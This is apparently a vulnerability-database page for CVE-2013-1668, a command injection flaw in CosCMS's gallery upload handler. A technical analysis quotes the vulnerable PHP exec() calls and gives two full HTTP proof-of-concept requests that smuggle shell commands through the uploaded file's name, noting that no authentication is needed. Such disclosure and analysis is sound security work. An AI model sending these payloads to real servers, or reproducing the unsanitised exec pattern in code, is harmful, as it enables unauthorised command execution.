Attacker Value
Unknown
(1 user assessed)
Exploitability
Unknown
(1 user assessed)
User Interaction
Unknown
Privileges Required
Unknown
Attack Vector
Unknown
0

CVE-2013-1668

Disclosure Date: May 23, 2014
Add MITRE ATT&CK tactics and techniques that apply to this CVE.

Description

The uploadFile function in upload/index.php in CosCMS before 1.822 allows remote administrators to execute arbitrary commands via shell metacharacters in the name of an uploaded file.

Add Assessment

1
Technical Analysis
  • In fact, doesn’t seem like the user should be authenticated at all. Looking at this request:
POST /gallery/upload/index HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------21456260222104
Content-Length: 970
-----------------------------21456260222104
Content-Disposition: form-data; name="title"
1
-----------------------------21456260222104
Content-Disposition: form-data; name="image_add"
1
-----------------------------21456260222104
Content-Disposition: form-data; name="description"
1
-----------------------------21456260222104
Content-Disposition: form-data; name="tags"

-----------------------------21456260222104
Content-Disposition: form-data; name="MAX_FILE_SIZE"
100000000
-----------------------------21456260222104
Content-Disposition: form-data; name="APC_UPLOAD_PROGRESS"
511ad0922b50f
-----------------------------21456260222104
Content-Di sposition: form-data; name="file"; filename="1 & ls -la > file.txt"
Content-Type: application/octet-stream
1
-----------------------------21456260222104
Content-Disposition: form-data; name="submit"
Update
-----------------------------21456260222104--

According to my testing, really authentication isn’t needed to reach the vulnerable code.

  • Vulnerability: The vulnerable resides on modules/gallery/upload/index.php, in the uploadFile() function, where
    $exec is called with partially user controlled data:
$command = "mv " . $_FILES['file']['tmp_name'] . " $zip";
//die;
exec ($command, $output = array (), $res);


$command = "chmod 777 " . $zip;
exec ($command, $output = array (), $res);

$command = "unzip -o -UU " . $zip;
exec ($command, $output = array (), $res);

The $zip variable can be partially controlled:

$zip = "/tmp/" . $_FILES['file']['name'];

Since $_FILES[‘file’][‘name’] is used for injection “/” is a badchar, which makes exploitation (of something usefull) really difficult:

  1. Execution is with www-data privileges by default, not a lot of things to do.
  2. You are executing from modules/gallery/upload where by default, and in the recommended installation user hasn’t privileges for writting. So
    the provided PoC by htbridge doesn’t work at all in a default installation:
Content-Di sposition: form-data; name="file"; filename="1 & ls -la > file.txt"

You cannot write file.txt in modules/gallery/upload by default.

My PoC:

POST /gallery/upload/index HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:10.0.1) Gecko/20100101 Firefox/10.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://localhost/gallery/view/1
Content-Type: multipart/form-data; boundary=---------------------------1107861128371857341391966473
Content-Length: 360

-----------------------------1107861128371857341391966473
Content-Disposition: form-data; name="file"; filename="ls; <COMMAND>"
Content-Type: text/plain

msf.txt

-----------------------------1107861128371857341391966473
Content-Disposition: form-data; name="submit"

Upload File
-----------------------------1107861128371857341391966473--
CVSS V3 Severity and Metrics
Base Score:
None
Impact Score:
Unknown
Exploitability Score:
Unknown
Vector:
Unknown
Attack Vector (AV):
Unknown
Attack Complexity (AC):
Unknown
Privileges Required (PR):
Unknown
User Interaction (UI):
Unknown
Scope (S):
Unknown
Confidentiality (C):
Unknown
Integrity (I):
Unknown
Availability (A):
Unknown

General Information

Vendors

  • coscms

Products

  • coscms,
  • coscms 1.3,
  • coscms 1.41
Technical Analysis